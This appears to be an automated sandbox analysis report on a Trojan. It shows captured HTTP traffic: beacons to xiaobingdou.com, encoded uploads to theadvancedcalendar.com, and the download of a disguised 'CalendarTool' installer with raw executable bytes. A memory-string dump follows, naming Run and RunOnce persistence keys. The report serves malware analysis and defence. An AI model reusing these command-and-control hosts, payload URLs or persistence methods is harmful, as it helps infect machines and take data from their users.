<<< skipped >>>

POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 500 Internal Server Error

Connection: close

Date: Tue, 03 May 2016 01:55:57 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Type: text/html; charset=utf-8

Content-Length: 3030

<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... &lt

<<< skipped >>>

POST /anzhuang.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDMzMUQzQ0VBQTM1RUNEMDQ2MkQ0Q0Q3MjA5QzgzMTI2NzUwN0E1M0FGRkQ4RjlEMTk1OTVDNDg1MDUwMTkwMEFGNDc2OTBGOUUzMUU3NTREMTE3RkJBM0I4RDA0NkE5QjA= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 200 OK

Connection: close

Date: Tue, 03 May 2016 01:55:49 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Length: 0

POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 500 Internal Server Error

Connection: close

Date: Tue, 03 May 2016 01:55:52 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Type: text/html; charset=utf-8

Content-Length: 3030

<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... &lt

<<< skipped >>>

POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 500 Internal Server Error

Connection: close

Date: Tue, 03 May 2016 01:55:55 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Type: text/html; charset=utf-8

Content-Length: 3030

<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... &lt

<<< skipped >>>

POST /reportInstall.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUVBQkJBMzMzMzEwNjZEMjZGQzNDMkMwREI0MTIwQ0ZGNTEyM0U1Q0FDODhFRjdFN0MxNEE5NkY3NzMxQUNEQTY5RTY0MTEwOEI5MDkyQzg5ODE1NDcxQTQwMUFBRkYxRTFBRDFBOTYyMkZBRkVBMzI4MERBQUNDQ0Y2MTk3OUY3NjRFM0FGNzZFMzc4M0Q1MjJBM0YyRDMzNTBEMDY4MjI= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 200 OK

Connection: close

Date: Tue, 03 May 2016 01:55:54 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Length: 0

POST /cgi-bin-py/calendar_install.cgi HTTP/1.1

Content-Type: multipart/form-data; boundary=C528ED7CB09146c38C186BBBE233AE4A

User-Agent: BDI18N

Host: VVV.theadvancedcalendar.com

Content-Length: 468

Connection: Keep-Alive

--C528ED7CB09146c38C186BBBE233AE4A

Content-Disposition: form-data; name="ufile01"; filename="boundary"

Content-Type: application/octet-stream

/x..g^t..rn..a@.lj..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.zf.N'..vv..c.lH..$..oT.-).P(.vD.7(.NaL.?.:f.7..gh.

4.(...n. P.9|.RaL.ft.D:R.C.#3.a..:x.H;L}A.f&.S7..!).Pq^..._(......j.?a$.<.-N.L'.%j.S=>;C.P_.Q.=.ix.Hc.=..wf.X*..;>.H0^~P.9e.D...&x.H(Pl..ko..a..86..d.:..w(.]=1E38566

--C528ED7CB09146c38C186BBBE233AE4A--

HTTP/1.1 200 OK

Content-Type: text/plain

Date: Tue, 03 May 2016 01:56:07 GMT

Server: Apache

Content-Length: 7

Connection: keep-alive

successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 2016 01:56:07 GMT..Server: Apache..Content-Length: 7..Connection: keep-alive..success..

POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 500 Internal Server Error

Connection: close

Date: Tue, 03 May 2016 01:55:54 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Type: text/html; charset=utf-8

Content-Length: 3030

<html>.. <head>.. <title>Runtime Error</title>.. <style>.. body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} .. p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}.. b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucida Console";font-size: .9em}.. .marker {font-weight: bold; color: black;text-decoration: none;}.. .version {color: gray;}.. .error {margin-bottom: 10px;}.. .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }.. </style>.. </head>.. <body bgcolor="white">.. <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>.. <h2> <i>Runtime Error</i> </h2></span>.. <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">.. <b> Description: </b>An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine... &lt

<<< skipped >>>

GET /CalendarTool_Setup_En_pure_Release_calendarbase[2015-12-25.16.42].exe HTTP/1.1

User-Agent: HTTP_CLIENT

Host: download.intechnical.online

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Tue, 03 May 2016 01:56:01 GMT

Server: PWS/8.1.36

X-Px: rf-ht h0-s1105.v0-mow ( h0-s1170.v0-mow), ht-d h0-s1170.v0-mow.cdngp.net

ETag: "a612003-5bb3c8-529aa33cff880"

Cache-Control: max-age=604800

Expires: Sun, 08 May 2016 19:41:41 GMT

Age: 108860

Accept-Ranges: bytes

Content-Length: 6009800

Content-Type: application/x-msdownload

Last-Modified: Tue, 19 Jan 2016 06:44:34 GMT

Connection: keep-alive

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@.................................c.\...@.................................@............\..........@.[......`.......................................................................................text....r.......t.................. ..`.rdata..n .......,...x..............@..@.data.... ..........................@....ndata...................................rsrc....\.......^..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......G..H.P.u..u..u.....@..K...SV.5..G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h.jG.W....@..u.W...u....E.P.u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ

<<< skipped >>>

POST /iplookup/iplookup.php HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: int.dpool.sina.com.cn

HTTP/1.1 200 OK

Server: Tengine

Date: Tue, 03 May 2016 01:55:47 GMT

Content-Type: text/html; charset=gbk

Content-Length: 20

Connection: close

DPOOL_HEADER: tyr106

SINA-LB:aGEuMTE4LmcyLnlmLmxiLnNpbmFub2RlLmNvbQ==

SINA-TS:OWJmMjk2Y2UgMCAwIDAgNSAwCg==

1.-1.-1...............

POST /anzhuang.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDM0QTgwQkI4OUI1QTIxODYwRjFBQjM1RjIwMThCOUYyMTkzQjZFODExM0U2MENDMjc5NERDNDQwM0EzNzVGNzZCODJCODdDRUJGMkEwNUEwQjU4MDVBMzYxRjE5QkFBRkY= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 200 OK

Connection: close

Date: Tue, 03 May 2016 01:55:48 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Length: 0

POST /xiezai.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY4QzMwQkJBRUIwNzA1QTEyNzBDM0RFQTk1OTJDN0ZCMzdDQTY3QzRGN0I0RDA2NDAzMzc0M0IyRTYzQjk0OTY= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 200 OK

Connection: close

Date: Tue, 03 May 2016 01:56:00 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Length: 0

POST /down.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczMEIwNkU4RDJCMTk4QUU0QUNBQkQxQzM1RTA0QzVBQzU= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: xiaobingdou.com

HTTP/1.1 200 OK

Connection: close

Date: Tue, 03 May 2016 01:55:58 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Length: 0

POST /cgi-bin-py/calendar_install.cgi HTTP/1.1

Content-Type: multipart/form-data; boundary=26BC8369D6944cca92B4EAA85508054A

User-Agent: BDI18N

Host: VVV.theadvancedcalendar.com

Content-Length: 450

Connection: Keep-Alive

--26BC8369D6944cca92B4EAA85508054A

Content-Disposition: form-data; name="ufile01"; filename="boundary"

Content-Type: application/octet-stream

/x..g^t..rn..a@.lj..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.zf.N'..vv..c.lH..$..oT.-).P(.vD.7(.NaL.?.:f.7..gh.

4.(...n. P.9|.RaL.ft.D:R.C.#3.a..:x.H;L}A.f&.S7..!).Pq^...ok.L...=4.P(Ml^.tf..5..v`.H&^>..~d.n"..v`..o.;..~r..oT.-*.H0^(..wU.N0..86..o.'..fw=1E38566

--26BC8369D6944cca92B4EAA85508054A--

HTTP/1.1 200 OK

Content-Type: text/plain

Date: Tue, 03 May 2016 01:56:05 GMT

Server: Apache

Content-Length: 7

Connection: keep-alive

successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 2016 01:56:05 GMT..Server: Apache..Content-Length: 7..Connection: keep-alive..success..

POST /open/51486.ini HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: wsxc123.cc

HTTP/1.1 405 Method Not Allowed

Allow: GET, HEAD, OPTIONS, TRACE

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Tue, 03 May 2016 01:55:49 GMT

Connection: close

Content-Length: 1202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=gb2312"/>..<title>405 - .................... HTTP ......</title>..<style type="text/css">....</style>..</head>..<body>..<div id="header"><h1>..........</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>405 - .................... HTTP ......</h2>.. <h3>....................................................(HTTP ....)..</h3>.. </fieldset></div>..</div>..</body>..</html>....

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

Explorer.exe_660:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

BROWSEUI.dll

GDI32.dll

KERNEL32.dll

NTDLL.DLL

msvcrt.dll

ole32.dll

OLEAUT32.dll

SHDOCVW.dll

SHELL32.dll

SHLWAPI.dll

USER32.dll

UxTheme.dll

FTSSh

t0SSh

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system

SShwk

98~%SP

ExplorerStartMsgLoop

PSSh;

6SSSSh

SSSSh

SPSSSShL

u%SSh

t.WWWW

xpsp2res.dll

xpsp3res.dll

tbSSh

Software\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartMenu

Software\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartPanel

kernel32.dll

GetSystemWindowsDirectoryW

NetGetJoinInformation

WINMM.dll

SETUPAPI.dll

WINSTA.dll

OLEACC.dll

USERENV.dll

ntdll.dll

RegEnumKeyExW

RegNotifyChangeKeyValue

RegOpenKeyExA

RegEnumKeyW

RegCloseKey

RegCreateKeyW

RegQueryInfoKeyW

RegOpenKeyExW

RegCreateKeyExW

OffsetViewportOrgEx

GetViewportOrgEx

SetViewportOrgEx

SetProcessShutdownParameters

GetProcessHeap

GetWindowsDirectoryW

CreateIoCompletionPort

ShellExecuteExW

SHRegCloseUSKey

SHRegCreateUSKeyW

AssocQueryKeyW

SHRegOpenUSKeyW

SHDeleteKeyW

TileWindows

ExitWindowsEx

RegisterHotKey

UnregisterHotKey

EnumChildWindows

GetKeyState

GetAsyncKeyState

CascadeWindows

MsgWaitForMultipleObjects

EnumWindows

explorer.pdb

name="Microsoft.Windows.Shell.explorer"

version="5.1.0.0"

Windows Shell

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

]]"```^]]\

3333333330

3333330

333333334

)@. '5 !*

.DEHHF>?/

2

&$%Uooqkezs

['$$#%&(4

3333333333333333333

33333333333330

7''''))

3'')))33.

222`444(555

%%%{///-

000000000

00000000

`[66...00

0000000

`]66./.000

/./././././././.

66///0000

0000000000000

0000000000

6666,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,0.010.010.010.010.010.010.010.010.010.010.001

4366666666K,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6.010.010.010.010.010.010.010.010.010.010.000

:;

) ) ) ) )

|2222'2'2'2'2'2'2'2'2'2'2'2'2'2'2'2',),),),),),),),),),),),),),),),),),),),),),,

22222222222

3333333

.SB99;;;99twv}ut{oxt~

.SB;;;:::2:w}{{qddgghg

" """ """ """ """ "" #

""" """ """ "#

.SG>''';;9::p

:5:5:5:5:5:5:5:5:5:5#"

# # # # # # # # # # # # # # # # # # # # # ##$

( # # # # # # # # # # # # # # # # # # # # ###

1232123212321232123

(&(((&(((&(((&(((&((&&)

&(((&(((&(((&()

`,''')))

'4,4'4,4'4,4'4,4'4,4)(

55///0000

5555-5-5-5-5-5-5-5-5-5-5-5-5-5-5-5-0

555555555

55555555

5555555

14441444144414441

4343434343434343

5555555555555

5555555555

-,-,-,-,-,-,-,-,-,-,-*.

..............................JFJFJFJFJFJFJFJFJFJFJ.-

{22*2*2*2*2*2*2*2*2*2*2*2*2*2*2*2*.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-../

|ujjjjuhF..BBBBBBBBBBBBT

~j|F.BB*BBB*BBB*Bwop

&!!!&!!!&

44466666

44444444416

4446666

66666666

|= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |=

|= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |=

DDDDE%CTDD@

A%US$

%UUUU

%%UUU

33U

""2222!!

!"!"%UUR""

!""!"#2"""

"!!"#3"!"

dnnnnn:n.nfCnmddddd

////;/;;88

;888;;!/

!//!!;;^

:;:!::!!!

.88.88.8

.N.NN.M

::8.8...

:::!;;:!

//!!;888

.8.8.88...

:;!::!!;!//!;

!!;:!!::

.88..8..

!!:::/^!

!;/;!;;;!!!:

.8:!!!!^

!!:;:::..

/:!^^!;{8{../

...:::.-

**6***66*6**6566*5666 ,

6*6666*6*6 655*65

6*65 56*5 55 555 *5 6

555( 55 (5 5(

76 5 66 555*677

6*6 5 5(5 (55( '5((5 (556 ('5

665**6(('S((((((S(((]('((@('SS((S(((((((6C-.NEC66S5sU

555(555(5((5(5(5(

5 5 5 5555 (555(555'(((5(5('55(((

((''('5'5(5('('('('('((''('(((@(((('&(((&

%&&%&&&&3>&3&3&33&3&3333&&3>3333

'(3&'&3&

3&33&&((

3323>33>%>3%>3>33>3%3&%

*5'(('((&@3(

,63%3>323>3%>&>33323>>%>

3(3'(((@@'5('@(@(&('(

>2>323%>3

75((((@3&333&3&&&%&3&&3&33>33%3>23%>3

>2%$32%>2>%>2$3>

3&%&&3&33>3>33

3>%>3%&3$23>23$2>2%$>2>

)4433((&(&('*

('((((''(**6(('' *

32323>3>

2$%>22%>%3' (

&(&''((5(5 *

'(&(&((&('''

&&%&3&&%3%

2%>22>22

5''3(((3(('&(&'&

3%%3%3%2#$

22$22$2%$22$2%2%$2%$2$222%$22

&>2$2$2$222$22$%%

:7'((('(3('(3(&(&

222222222222

22222222222222

222222222222222

22$22$22$22$

&(%3%&&&&3&&&3%3

222222222222222222

&&(&3(&(&'('((3'(&&

2222222

22$

&&(3(3('(&'

222"2212

22

(&(3(3((

((565 ((( 6

333&33(&&

'(('('(('(

'&%%"$

2"2"22"2

2222

"2"22

2%('(3'32222?&'

2"2"2"121212

2"2"2$"?

%%22%2

&3(3(3((&

"2"

1"?((&21

22

2%""22&&

2

'&('(3(''

((%%%"

5(3%"%

"2%5*67

))) ))))

""**

"*

#2#---2222-222442-

---(-%

$/222(--444222!

#&-221269924999;

&$-22-($2%

#(2---222622212-

#2221299629968

#&--%#(2##!

-222422422426662-%

"2-##&

!##-#-&%---#---#&-219662%

$&-(151,44.9

&1242662-

-(..19.19

,4492.12

12-$-,-,

-, $$----

#%#-15/-&

-,(,,(,(,

$$11651566/,$&&

,2592&&&-

2466/!$$

""*

) '????[

&&&$-556>>61,,5994511-

$(//$$$(6>6/,$,-$

#$-22692/,,$,-&

-266661..4514#

&,2-&#

&-222,22--#

#&&---2-,-&$&(,,291.566..BNNNTNNNNNAABIAA88

&!#&!-##

--//11468>885882&

$266961$&--$&%

,1661,!-((#

&$,4255$,92

&$,44..&

""**""***""

"****

"**""""*""""

&-569./-,16522$

.BAA=86546888=AAAEAAEMNRMQQSWZZ\]gk__m__\

bTRHHHHHQQHQJQWJSSSSSSSSSSSSSSSSWWSSSS\\V]VZW8,.FW]\\]\]\]\\ZZ\\WFR>38(

.BTTkgn]ktvgmvvvvvmvvvsvzzzyzyzyzyyyzmkkkkkZSRA816;F87

yzyzyzym^Z]WN3 $&$.Wt\

""*"""****""""

"***"**""**

$5612,.2,

&$$,,,5]

$]t.Ft

7%8U8

3 303

2

8 8$8(8,80848885%5,575{6
7 7$7(7,70747
rundll32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
::{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}
::{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0}
::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}
::{2559a1f0-21d7-11d4-bdaf-00c04f60b9f0}
::{2559a1f1-21d7-11d4-bdaf-00c04f60b9f0}
::{D20EA4E1-3957-11d2-A40B-0C5020524153}
::{2559a1f7-21d7-11d4-bdaf-00c04f60b9f0}
{208D2C60-3AEA-1069-A2D7-08002B30309D}
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites
{450D8FBA-AD25-11D0-98A8-0800361B1103}
CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
Software\Microsoft\Windows\CurrentVersion\Explorer\DontShowMeThisDialogAgain
Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz
\\.\WMIDataDevice
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Software\Microsoft\Windows NT\CurrentVersion\Windows
ExplorerIsShellMutex
desk.cpl
Software\Microsoft\Windows\CurrentVersion\Explorer
tourstart.exe
tourstart.exe,0
Microsoft.OfferTour
WINWORD.EXE
Software\Microsoft\Windows\CurrentVersion\Applets
Software\Microsoft\Windows\CurrentVersion\Applets\Tour
explorer.exe,9
Microsoft.FixScreenResolution
shell:::{2559a1f4-21d7-11d4-bdaf-00c04f60b9f0}
Software\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation
Software\Microsoft\Windows NT\CurrentVersion
shell:::{2559a1f5-21d7-11d4-bdaf-00c04f60b9f0}
Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
DDEEXECUTESHORTCIRCUIT
http\shell
IEXPLORE.EXE
Software\Microsoft\Windows\CurrentVersion\Explorer\Streams\Desktop
Software\Microsoft\Windows\CurrentVersion\RunOnceEx
comctl32.dll
Software\Microsoft\Windows\Internet Settings
AutoConfigURL
system.ini
AppEvents\Schemes\Apps\.Default\%s\.current
Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify
MSShellRunDlgReady
res://mys.dll/mys.hta /explorer
mshta.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\Welcome
Software\Microsoft\Windows\CurrentVersion\Explorer\Tips
SOFTWARE\Policies\Microsoft\Windows NT\CurrentVersion\MYS
cys.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\srvWiz
install.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel
OUTLOOK.EXE
explorer.exe,16
iernonce.dll
WININET.DLL
UpdateURL
WindowsUpdate
HWND%x
Software\Microsoft\Windows\CurrentVersion\OemStartMenuData
fldrclnr.dll,Wizard_RunDLL
iexplore.exe
winbrand.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\Remote\%d
shell32.dll
